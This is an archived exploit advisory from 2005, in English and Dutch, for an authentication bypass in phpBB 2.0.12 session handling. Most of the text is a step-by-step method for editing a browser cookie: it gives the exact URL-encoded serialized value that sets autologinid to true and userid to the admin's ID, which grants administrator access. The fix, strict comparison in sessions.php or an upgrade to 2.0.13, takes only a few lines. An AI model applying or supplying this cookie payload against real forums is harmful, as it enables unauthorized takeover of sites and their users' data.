phpBB2012session.txt

phpBB2012session.txt: Posted Mar 12, 2005; Authored by PPC; phpBB 2.0.12 session handling exploit that allows for administrative compromise.; tags | exploit; SHA-256 | 8142b72c22b6629166d0585d515d339b725b68c6888afca57777e9af981784dd; Download | Favorite | View

phpBB2012session.txt



-----------------------------------

   phpBB 2.0.12 Session Handling
   Administrator Authentication
   Bypass EXPLOIT -SIMPLIFIED-
               - By PPC^Rebyte

-----------------------------------

                              03maa2005

** NEDERLANDSE VERSIE ONDERAAN / DUTCH VERSION BELOW **

[ ENGLISH VERSION ]

*** Status
__________

phpBB has already been informed about this exploit and has released a
'critical update' on 27 februari 2005, however most forums are still running
version 2.0.12 or lower.

VULNERABLE:
  - 2.0.x --> 2.0.12

IMMUNE:
  - 2.0.13 or newer


1* Intro
________

The discoverer of this bug is unknown, says "Paiserist" who wrote a C exploit
for this bug.

Link to Paisterist's exploit at Packetstormsecurity:
  http://packetstormsecurity.org/0503-exploits/phpbbsession.c

This program didn't work as it should on my pc, so I had to find out a way
for myself to exploit the bug manually.
This seemed to be much easier than compiling that C exploit and fool around
with it until it eventually still doesn't work (in my case).
This simplified manual method I'll describe can also be used for Internet
Explorer or other browsers instead of only Mozilla/Firefox.


2* The bug
__________

We're going to edit a cookie so that when you visit a certain forum another
time you will get logged in having admin rights. This is possible due to a
bug in includes/sessions.php
  --> if( $sessiondata['autologinid'] == $auto_login_key )


3* Preparation
______________

1. Register at forum?

2. Log in with account
   + UNCHECK "Log in automatically"

3. Close browser to be sure a cookie is made.

4. Locate cookie
     *firefox: X:\Documents and Settings\Name\Application
      Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt
      --> search the .txt for the domainname (domain.tld)
      --> default cookiename = phpbbmysql
     *iexplorer: X:\Documents and Settings\Name\Cookies\Name@domain.tld
      --> default cookiename = phpbbmysql

4* Let's Xploit!
________________

Open the cookie in a text editor and search a line that resembles:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

  a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B
  s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

                                          |
                   [ your 'user id' ] ____|

Replace this with:

  a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B
  s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

                                          |
           [ 2 = 'user id' of admin ] ____|

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Save cookie and close.
Open your browser and surf to forum.

You'll now be automatically logged in having admin right :)


5* Solution
___________

* Update phpBB to version 2.0.13

    - or -

* in "includes/sessions.php" replace code:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

  if( $sessiondata['autologinid'] == $auto_login_key )

replace with:

  if( $sessiondata['autologinid'] === $auto_login_key )

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


6* Outro
________

    THE.END

Greetings 2 everyone at Rebyte and the whole Belgian scene !!
Additional greetings 2 Paisterist for the original C exploit !

                                                 -- PPC^Rebyte --
                                         -- ppc@respected.as --


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


[ NEDERLANDSE VERSIE ]

*** Status
__________

phpBB is geïnformeerd over deze exploit en heeft een 'critical update'
gelanceerd op 27 februari, maar de meeste forums draaien nog steeds op
versie 2.0.12 of lager.

KWETSBAAR:
  - 2.0.x tot 2.0.12

IMMUUN:
  - 2.0.13 of nieuwer


1* Intro
________

De ontdekker van de bug is onbekend, meldt "Paisterist" die een C exploit
heeft geschreven voor deze bug.

Link naar Paisterist's exploit op Packetstormsecurity:
  http://packetstormsecurity.org/0503-exploits/phpbbsession.c

Dit programma werkte voor geen klop op mijn pc, dus heb ik zelf een manier
gezocht, door middel van de exploit, om de bug handmatig te exploiteren.
Dit ging eigenlijk veel sneller dan de C exploit te moeten compileren
en ermee rond te moeten klungelen terwijl het uiteindelijk niet goed werkt
(in mijn geval).
De vereenvoudigde handmatige methode die ik omschrijf kan tevens gebruikt
worden voor Internet Explorer of andere browsers ipv alleen Firefox.


2* Werking
__________

We gaan een cookie zo aanpassen dat wanneer je een bepaald forum nog eens
bezoekt je ingelogd wordt met admin rechten door een bug in sessions.php
  --> if( $sessiondata['autologinid'] == $auto_login_key )

3* Voorbereiding
________________

1. Eventueel Registreren op forum

2. Inloggen met account
   + Automatisch Inloggen UITVINKEN

3. Browser sluiten zodat er zeker een cookie wordt aangemaakt

4. Cookie lokaliseren
     *bij firefox: X:\Documents and Settings\Name\Application
      Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt
      --> zoek in de .txt naar de domeinnaam (domain.tld)
      --> standaard cookienaam = phpbbmysql
     *bij iexplorer: X:\Documents and Settings\Name\Cookies\Name@domain.tld
      --> standaard cookienaam = phpbbmysql

4* Let's Xploit!
________________

Open de cookie in een teksteditor en zoek naar een lijn die gelijkt op:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

  a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B
  s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

                                          |
                     [ je 'user id' ] ____|

Vervang dit door:

  a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B
  s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

                                          |
          [ 2 = 'user id' van admin ] ____|

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Cookie opslaan en sluiten.
Browser openen en naar forum surfen.

Normaal wordt je nu ingelogd met admin rechten :)


5* Oplossing
____________

* phpBB updaten naar 2.0.13

    - of -

* in includes/sessions.php code vervangen:

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

  if( $sessiondata['autologinid'] == $auto_login_key )

vervangen door:

  if( $sessiondata['autologinid'] === $auto_login_key )

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


6* Outro
________

    THE.END

Greetings 2 everyone at Rebyte en de hele Belgische scene !!
Additional greetings 2 Paisterist voor de originele C exploit !

                                                 -- PPC^Rebyte --
                                         -- ppc@respected.as --

Top Authors In Last 30 Days

Red Hat 216 files
Ubuntu 78 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

phpBB2012session.txt

phpBB2012session.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpBB2012session.txt

Share This

phpBB2012session.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems